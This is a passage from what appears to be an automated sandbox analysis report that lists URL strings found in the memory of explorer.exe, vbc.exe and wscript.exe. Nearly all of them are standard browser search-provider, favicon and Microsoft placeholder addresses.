          Source: explorer.exe, 00000008.00000000.2206193001.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206193001.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2194316905.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: http://gmpg.org/xfn/11
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: vbc.exe, 00000004.00000002.2178642047.0000000000910000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193008298.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: vbc.exe, 00000004.00000002.2178642047.0000000000910000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193008298.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: vbc.exe, 00000004.00000002.2179124238.0000000000AF7000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193231834.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: vbc.exe, 00000004.00000002.2179124238.0000000000AF7000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193231834.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: explorer.exe, 00000008.00000000.2181497235.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000008.00000000.2195288606.0000000004F30000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.2389538314.0000000001E80000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: vbc.exe, 00000004.00000002.2179124238.0000000000AF7000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193231834.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2194316905.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000008.00000000.2194316905.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: vbc.exe, 00000004.00000002.2179124238.0000000000AF7000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193231834.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: http://wordpress.org
          Source: explorer.exe, 00000008.00000000.2206193001.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000008.00000000.2181497235.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
